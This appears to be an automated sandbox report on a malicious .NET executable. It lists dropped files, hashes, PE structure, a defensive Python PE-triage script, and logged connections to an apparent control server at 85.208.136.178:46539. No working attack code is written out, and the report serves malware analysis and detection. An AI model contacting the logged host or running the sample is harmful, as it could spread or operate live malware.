                                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2882898331044472
                                                          Encrypted:false
                                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2882898331044472
                                                          Encrypted:false
                                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):49152
                                                          Entropy (8bit):0.7876734657715041
                                                          Encrypted:false
                                                          SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                          MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                          SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                          SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                          SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.691266297898928
                                                          Encrypted:false
                                                          SSDEEP:24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
                                                          MD5:7D4E714F4EDA4631DCA8D420338392F1
                                                          SHA1:536B4BCBAB5C780738EE2D562D16AB532C9D8E68
                                                          SHA-256:841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
                                                          SHA-512:FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.698711683401115
                                                          Encrypted:false
                                                          SSDEEP:24:qKHpKPokvebe5xXL3g76mBU/gS2JBbl20IS7pnXk:Rpcjnxbw7TYgS2nbzIS7pnXk
                                                          MD5:47643CE7571E0C995094D7CE5F2005D7
                                                          SHA1:40D42828B2F68C625EBD884FB8AF5B20F5A1DF9C
                                                          SHA-256:1D642D4EC7BC821B0FFA28C3F2702C875C922139D8001EADD664EBCCF8D321B3
                                                          SHA-512:3AAD0470C01D2609662C0B8D146BA79132B404C669C22032D085233E2D30725797AC2E15A11F54DFE00E4B6CA6E914E3439D4775B3AF6D782334FE9424F485A5
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.69486718145169
                                                          Encrypted:false
                                                          SSDEEP:24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
                                                          MD5:E63B196AE0D5F7670244FB1347D75EFC
                                                          SHA1:1C17108AC7E5263674836BAD67AE44D8C3C6890B
                                                          SHA-256:D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
                                                          SHA-512:63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
                                                          Malicious:false
                                                          Preview:LIJDSFKJZGBDGXNCCVBULCELYCDFJRIXKMFPVDHHKPYEYOXKFYMNEETRQHXLDRVBOTNERMYOYUJOPHUSKFPWBGKNJYBGZTTHNKGNUZWATSMORYBOIKBFSVUUMZNDYXOYKYUKGRNFVRQOPBEEIPDGTPBXCNLKHMGPHFCEQOUTEDGJZTMFUUGECZETRSODGZCJVQEAMRZADPDVQRANZOSHTGPOXPXGXXQDJVYZOCNXDECWJISPPIJOZUBSSKPGODUHTISNESPZRLELINJJYOXSBFTVUDENIBRDIMMGFIQNDGUSXDBHQNJRYLFTZGOCELKZGOQQKNDPFAMTXHBKHJYXYEGLJLANRMMTCVEFYRTWLXIMCCHDWVOLGVUWRNLSIBMLMBKVSYLKXRTMZROHVHCRDBCODTPNVQMBPRJGBGOOFVGDIERMXUFETJQWDXSQQFMQAZGGRVNRCUOAVYJDIMQETJOANIIDEGJCHEFRSNVBQAQBBUTTMXBTJXRHLSOCTPPBIKPXITOOCINTVZYAVQLVOOZWSOPLYJPOTKFKIKEHIDDPCDDEPKVDYQAVTVBFYYWCGUKGIDVLQSIPXISDEDNJWONTSILFUGUYMKQLKEJGOOCBYSXDFHNFHHWGLXWWQKSSOHSSTZLRZVRHZVBZGGEZQFSIWQQPMILSPBAMPAGAHHVJJCITDTJRZTRBEXSXOVDKONGLMSWBAOOYAFISJHKEYUKIWXBFUDUMVQRELEPVTNQBALAQOEAEFVPIKNYIPNICGKQFRVXNQUEFULLOYWMHOMUFEMHYNKNWMAOBGWSECZOKWISDOIKSUVWBGWPNAMFUHBRWEJQPHFPEKIRLAEPTBNRQEUVXXIZSSOOEFEETUMNPSVEAKOXVYHAOIXBEYBVXDJXZCNDVOPZLARFFUSXUOWXQBKDLINBWBQLXLHHNIXZEPCNHFEIZUZSTXWFUITSBKYSELMNKNBBDQMNLAIOSKYHCWGFPNUXAFSRHOWYH
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.694142261581685
                                                          Encrypted:false
                                                          SSDEEP:24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
                                                          MD5:E9AA17F314E072EBB015265FB63E77C0
                                                          SHA1:1233B76350B8181FFFC438B62002C02B4AE79000
                                                          SHA-256:F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
                                                          SHA-512:719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2882898331044472
                                                          Encrypted:false
                                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):348672
                                                          Entropy (8bit):5.276672751026678
                                                          Encrypted:false
                                                          SSDEEP:3072:kd4jFS378hlr02cpbHrxfV0WzJsQuJpnpvcPavg3igp06mLkXDQWmE6:W378ib70cWpnv2+6mLkzQE6
                                                          MD5:68F42F485ECE93306BEF1E4084D3052E
                                                          SHA1:C63F1A56D12A0ACBF5E9A354D8A66C6E17AF2309
                                                          SHA-256:5D526BE000146CF9CF94F7EF6F4E86929D508E17CA483B03D4ECBD2D52E071C9
                                                          SHA-512:75E09E7505039A7EB0D0652666F3ED258D50C2536BB3877C2E1503E69700AAE6A8014EF6B8F4F7F41BFA11F857CF0240F1A950F66395D19AE12707DB863C1242
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...PT.c.................R..........Fp... ........@.. ....................................@..................................o..J.................................................................................... ............... ..H............text...LP... ...R.................. ..`.rsrc................T..............@..@.reloc...............P..............@..B................,p......H............a..........p.................................................(W...*.0..U.......~.... ....(t....-.&~....~....(.....(....&..,.&.#.+..+..~.....(....~.....(....sX...z.*...........66.......0..........~Y....:....&sZ....9....&~.....~.... ....(t....:}...&&&~.....~.... ....(t....-l&&&~.....~....~.... ....(t....(.....,M&&&~.......,G&&&.-..9......~.....(....&~....(....&...-.8h...(....8|...(....+.(....+.(....+.&...,....9#....*.8'.......................0..^........-i~....~...
                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:modified
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:ggPYV:rPYV
                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                          Malicious:true
                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):5.276672751026678
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          • DOS Executable Generic (2002/1) 0.01%
                                                          File name:workalone.exe
                                                          File size:348672
                                                          MD5:68f42f485ece93306bef1e4084d3052e
                                                          SHA1:c63f1a56d12a0acbf5e9a354d8a66c6e17af2309
                                                          SHA256:5d526be000146cf9cf94f7ef6f4e86929d508e17ca483b03d4ecbd2d52e071c9
                                                          SHA512:75e09e7505039a7eb0d0652666f3ed258d50c2536bb3877c2e1503e69700aae6a8014ef6b8f4f7f41bfa11f857cf0240f1a950f66395d19ae12707db863c1242
                                                          SSDEEP:3072:kd4jFS378hlr02cpbHrxfV0WzJsQuJpnpvcPavg3igp06mLkXDQWmE6:W378ib70cWpnv2+6mLkzQE6
                                                          TLSH:747439267384DF26C79223B7C6035BA002184C197785EE76A4E529FC94A1FFAD9CF193
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...PT.c.................R..........Fp... ........@.. ....................................@................................
                                                          Icon Hash:64c68eb2b3b686c4
                                                          Entrypoint:0x427046
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x63865450 [Tue Nov 29 18:49:52 2022 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al   (repeated 97 times: the bytes following the 6-byte stub are zero padding, and 00 00 disassembles as add byte ptr [eax], al)
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x26ffc          0x4a          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x28000          0x2faa4       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x58000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity      File Type  Entropy              Characteristics
.text   0x2000           0x2504c       0x25200   False     0.8109743265993266   data       7.585773646811085    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x28000          0x2faa4       0x2fc00   False     0.08600908049738219  data       2.4474216242910125   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x58000          0xc           0x200     False     0.044921875          data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA      Size     Type                                                                                Language  Country
RT_ICON        0x280b4  0x13ca   PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON        0x294a2  0x10828  Device independent bitmap graphic, 128 x 256 x 32, image size 67584
RT_ICON        0x39cee  0x94a8   Device independent bitmap graphic, 96 x 192 x 32, image size 38016
RT_ICON        0x431ba  0x67e8   Device independent bitmap graphic, 80 x 160 x 32, image size 26560
RT_ICON        0x499c6  0x5488   Device independent bitmap graphic, 72 x 144 x 32, image size 21600
RT_ICON        0x4ee72  0x4228   Device independent bitmap graphic, 64 x 128 x 32, image size 16896
RT_ICON        0x530be  0x25a8   Device independent bitmap graphic, 48 x 96 x 32, image size 9600
RT_ICON        0x5568a  0x10a8   Device independent bitmap graphic, 32 x 64 x 32, image size 4224
RT_ICON        0x56756  0x988    Device independent bitmap graphic, 24 x 48 x 32, image size 2400
RT_ICON        0x57102  0x468    Device independent bitmap graphic, 16 x 32 x 32, image size 1088
RT_GROUP_ICON  0x575b8  0x92     data
RT_VERSION     0x57686  0x1f8    data                                                                                English   United States
RT_MANIFEST    0x578ba  0x1ea    XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
DLL          Import
mscoree.dll  _CorExeMain
Language of compilation system  Country where language is spoken
English                         United States
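The static fields above are internally consistent and worth checking by hand on any .NET sample. The entry point 0x427046 is image base 0x400000 plus RVA 0x27046, which falls in the last 6 bytes of .text (0x2000 + 0x2504c = 0x2704c), exactly the length of the FF 25 stub `jmp dword ptr [00402000h]`; its target 0x402000 is the single 8-byte IAT directory entry, which the loader fills with the address of mscoree!_CorExeMain, the only import. Every .NET executable carries this same stub, so the Import Hash f34d5f2d4577ed6d9ceec516c1f5a744 identifies "a PE32 .NET binary", not this family, and is useless as a pivot; the section entropies (7.59 for .text against 2.45 for .rsrc) are the more telling static signal here. The script below is an added example, not part of the Joe Sandbox report or of the sample: it constructs a small PE32 image with this layout (image base 0x400000, .text at RVA 0x2000 starting with the IAT and the CLR header, a six-byte stub at the very end of .text as the entry point, a mostly-zero .rsrc), then parses it with the standard library only, maps the entry RVA to its section, verifies that the stub targets the IAT directory, and computes per-section 8-bit entropy. The section sizes, the pseudo-random .text body and the .rsrc contents are assumptions chosen for the demonstration.

```python
"""Stand-alone PE32 triage mirroring this report's static fields (added example, stdlib only)."""
import hashlib
import math
import struct
from collections import Counter

IMAGE_DIRECTORY_ENTRY_IAT = 12
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14
PE32_MAGIC = 0x10B


def shannon_entropy(data: bytes) -> float:
    """Bits per byte in 0.0..8.0, i.e. the report's 'Entropy (8bit)' column."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def _prng_bytes(n: int, seed: bytes = b"demo") -> bytes:
    """Deterministic high-entropy filler standing in for obfuscated IL (an assumption)."""
    out = bytearray()
    for i in range(-(-n // 32)):
        out += hashlib.sha256(seed + i.to_bytes(4, "little")).digest()
    return bytes(out[:n])


def _section_header(name: bytes, vsize: int, va: int, rawsize: int, rawptr: int, chars: int) -> bytes:
    return struct.pack("<8sIIIIIIHHI", name, vsize, va, rawsize, rawptr, 0, 0, 0, 0, chars)


def build_demo_pe(image_base: int = 0x400000, text_va: int = 0x2000, rsrc_va: int = 0x4000) -> bytes:
    """Constructed image laid out like the sample: IAT at .text+0, CLR header at .text+8,
    entry point = 6-byte 'jmp dword ptr [IAT]' as the last bytes of .text."""
    iat = b"\0" * 8                                  # one thunk (mscoree!_CorExeMain at runtime) + terminator
    cor20 = struct.pack("<I", 0x48) + b"\0" * 0x44   # IMAGE_COR20_HEADER, cb=0x48, rest zeroed
    stub = b"\xff\x25" + struct.pack("<I", image_base + text_va)  # FF 25 00 20 40 00
    body = _prng_bytes(9 * 0x200 - len(iat) - len(cor20) - len(stub))
    text = iat + cor20 + body + stub                 # 0x1200 bytes, already file-aligned
    rsrc = (b"\0" * 0x100 + b"<assembly/>").ljust(0x200, b"\0")  # mostly zeros: low entropy
    entry_rva = text_va + len(text) - len(stub)
    dirs = [(0, 0)] * 16
    dirs[IMAGE_DIRECTORY_ENTRY_IAT] = (text_va, len(iat))
    dirs[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR] = (text_va + len(iat), len(cor20))
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0x63865450, 0, 0, 224, 0x0102)  # i386, 2 sections, EXE|32BIT
    opt = struct.pack("<HBBIIIIII", PE32_MAGIC, 48, 0, len(text), len(rsrc), 0, entry_rva, text_va, rsrc_va)
    # ImageBase, SectionAlignment, FileAlignment, OS/Image/Subsystem versions, Win32Version, SizeOfImage,
    # SizeOfHeaders, CheckSum, Subsystem=GUI, DllCharacteristics=DYNAMIC_BASE|NX_COMPAT|NO_SEH|TS_AWARE, ...
    opt += struct.pack("<IIIHHHHHHIIIIHHIIIIII", image_base, 0x1000, 0x200, 4, 0, 0, 0, 4, 0,
                       0, 0x5000, 0x200, 0, 2, 0x8540, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", va, size) for va, size in dirs)
    headers = (b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40) + b"PE\0\0" + coff + opt
               + _section_header(b".text", len(text), text_va, len(text), 0x200, 0x60000020)
               + _section_header(b".rsrc", len(rsrc), rsrc_va, len(rsrc), 0x200 + len(text), 0x40000040))
    return headers.ljust(0x200, b"\0") + text + rsrc


def parse_pe(image: bytes) -> dict:
    """Read image base, entry RVA, data directories and section table from a PE32 file."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _machine, nsections, _stamp, _, _, opt_size, _chars = struct.unpack_from("<HHIIIHH", image, coff)
    opt = coff + 20
    if struct.unpack_from("<H", image, opt)[0] != PE32_MAGIC:
        raise ValueError("only PE32 handled here")
    (entry_rva,) = struct.unpack_from("<I", image, opt + 16)
    (image_base,) = struct.unpack_from("<I", image, opt + 28)
    (ndirs,) = struct.unpack_from("<I", image, opt + 92)
    dirs = {i: struct.unpack_from("<II", image, opt + 96 + 8 * i) for i in range(min(ndirs, 16))}
    sections = []
    for i in range(nsections):
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", image, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize, "rawsize": rawsize,
                         "rawptr": rawptr, "entropy": shannon_entropy(image[rawptr:rawptr + rawsize])})
    return {"image_base": image_base, "entry_rva": entry_rva, "dirs": dirs, "sections": sections}


def section_of(pe: dict, rva: int):
    """Section containing an RVA, or None (uses the larger of virtual and raw size)."""
    for s in pe["sections"]:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return s
    return None


def is_dotnet_entry_stub(image: bytes, pe: dict) -> bool:
    """True when the entry point is FF 25 <addr> (jmp dword ptr [addr]) with addr inside the IAT
    directory and a CLR header present: the pattern behind 'jmp dword ptr [00402000h]'."""
    sec = section_of(pe, pe["entry_rva"])
    if sec is None:
        return False
    off = sec["rawptr"] + (pe["entry_rva"] - sec["va"])
    stub = image[off:off + 6]
    if len(stub) < 6 or stub[:2] != b"\xff\x25":
        return False
    (target,) = struct.unpack_from("<I", stub, 2)
    iat_va, iat_size = pe["dirs"].get(IMAGE_DIRECTORY_ENTRY_IAT, (0, 0))
    _, clr_size = pe["dirs"].get(IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, (0, 0))
    iat_start = pe["image_base"] + iat_va
    return clr_size > 0 and iat_start <= target < iat_start + iat_size


def triage(image: bytes, entropy_threshold: float = 7.0) -> dict:
    """Where the entry point lives, whether it is the managed stub, which sections look packed."""
    pe = parse_pe(image)
    sec = section_of(pe, pe["entry_rva"])
    return {"entry_point": hex(pe["image_base"] + pe["entry_rva"]),
            "entry_section": sec["name"] if sec else None,
            "dotnet_stub": is_dotnet_entry_stub(image, pe),
            "high_entropy_sections": [s["name"] for s in pe["sections"] if s["entropy"] > entropy_threshold],
            "entropy": {s["name"]: round(s["entropy"], 3) for s in pe["sections"]}}


if __name__ == "__main__":
    print(triage(build_demo_pe()))
```

Run against a real file, `triage(open(path, "rb").read())` answers the three questions this part of the report answers: does execution start in .text, is the entry the generic CLR stub (in which case the import hash carries no family information and the interesting code is IL, to be looked at with a .NET decompiler rather than a disassembler), and which sections are high-entropy enough to suggest packing or string obfuscation.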
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Nov 30, 2022 00:07:25.722348928 CET  49685        46539      192.168.2.3      85.208.136.178
Nov 30, 2022 00:07:25.752378941 CET  46539        49685      85.208.136.178   192.168.2.3
Nov 30, 2022 00:07:25.752796888 CET  49685        46539      192.168.2.3      85.208.136.178
Nov 30, 2022 00:07:26.016802073 CET  49685        46539      192.168.2.3      85.208.136.178
Nov 30, 2022 00:07:26.088752985 CET  46539        49685      85.208.136.178   192.168.2.3
Nov 30, 2022 00:07:26.213782072 CET  46539        49685      85.208.136.178   192.168.2.3
Nov 30, 2022 00:07:26.218960047 CET  49685        46539      192.168.2.3      85.208.136.178
Nov 30, 2022 00:07:26.290599108 CET  46539        49685      85.208.136.178   192.168.2.3
Nov 30, 2022 00:07:26.380656004 CET  46539        49685      85.208.136.178   192.168.2.3
Nov 30, 2022 00:07:26.424237013 CET  49685        46539      192.168.2.3      85.208.136.178
Nov 30, 2022 00:07:34.937004089 CET  49685        46539      192.168.2.3      85.208.136.178
Nov 30, 2022 00:07:34.972991943 CET  46539        49685      85.208.136.178   192.168.2.3
Nov 30, 2022 00:07:35.004894972 CET  49685        46539      192.168.2.3      85.208.136.178
Nov 30, 2022 00:07:35.055725098 CET  46539        49685      85.208.136.178   192.168.2.3
Nov 30, 2022 00:07:35.055794954 CET  46539        49685      85.208.136.178   192.168.2.3
Nov 30, 2022 00:07:35.055846930 CET  46539        49685      85.208.136.178   192.168.2.3
Nov 30, 2022 00:07:35.055901051 CET  46539        49685      85.208.136.178   192.168.2.3
Nov 30, 2022 00:07:35.056029081 CET  49685        46539      192.168.2.3      85.208.136.178
Nov 30, 2022 00:07:35.056374073 CET  49685        46539      192.168.2.3      85.208.136.178
Nov 30, 2022 00:08:07.861217022 CET  49685        46539      192.168.2.3      85.208.136.178
Nov 30, 2022 00:08:07.890326023 CET  46539        49685      85.208.136.178   192.168.2.3
Nov 30, 2022 00:08:07.890465021 CET  49685        46539      192.168.2.3      85.208.136.178
Nov 30, 2022 00:08:08.012422085 CET  49687        46539      192.168.2.3      85.208.136.178
Nov 30, 2022 00:08:08.040680885 CET  46539        49687      85.208.136.178   192.168.2.3
Nov 30, 2022 00:08:08.040882111 CET  49687        46539      192.168.2.3      85.208.136.178
Nov 30, 2022 00:08:08.051173925 CET  49687        46539      192.168.2.3      85.208.136.178
Nov 30, 2022 00:08:08.118521929 CET  46539        49687      85.208.136.178   192.168.2.3
Nov 30, 2022 00:08:08.179694891 CET  46539        49687      85.208.136.178   192.168.2.3
Nov 30, 2022 00:08:08.181700945 CET  49687        46539      192.168.2.3      85.208.136.178
Nov 30, 2022 00:08:08.210653067 CET  46539        49687      85.208.136.178   192.168.2.3
Nov 30, 2022 00:08:08.212898016 CET  49687        46539      192.168.2.3      85.208.136.178
Nov 30, 2022 00:08:08.242925882 CET  46539        49687      85.208.136.178   192.168.2.3
Nov 30, 2022 00:08:08.243597984 CET  46539        49687      85.208.136.178   192.168.2.3
Nov 30, 2022 00:08:08.243987083 CET  49687        46539      192.168.2.3      85.208.136.178
Nov 30, 2022 00:08:08.272692919 CET  46539        49687      85.208.136.178   192.168.2.3
Nov 30, 2022 00:08:08.272722960 CET  46539        49687      85.208.136.178   192.168.2.3
Nov 30, 2022 00:08:08.273192883 CET  49687        46539      192.168.2.3      85.208.136.178
Nov 30, 2022 00:08:08.273495913 CET  46539        49687      85.208.136.178   192.168.2.3
Nov 30, 2022 00:08:08.273772001 CET  49687        46539      192.168.2.3      85.208.136.178
Nov 30, 2022 00:08:08.274296045 CET  46539        49687      85.208.136.178   192.168.2.3
Nov 30, 2022 00:08:08.300961971 CET  46539        49687      85.208.136.178   192.168.2.3
Nov 30, 2022 00:08:08.301352024 CET  49687        46539      192.168.2.3      85.208.136.178
Nov 30, 2022 00:08:08.301760912 CET  46539        49687      85.208.136.178   192.168.2.3
Nov 30, 2022 00:08:08.301800013 CET  46539        49687      85.208.136.178   192.168.2.3
Nov 30, 2022 00:08:08.302026987 CET  49687        46539      192.168.2.3      85.208.136.178
Nov 30, 2022 00:08:08.302115917 CET  46539        49687      85.208.136.178   192.168.2.3
Nov 30, 2022 00:08:08.302129030 CET  49687        46539      192.168.2.3      85.208.136.178
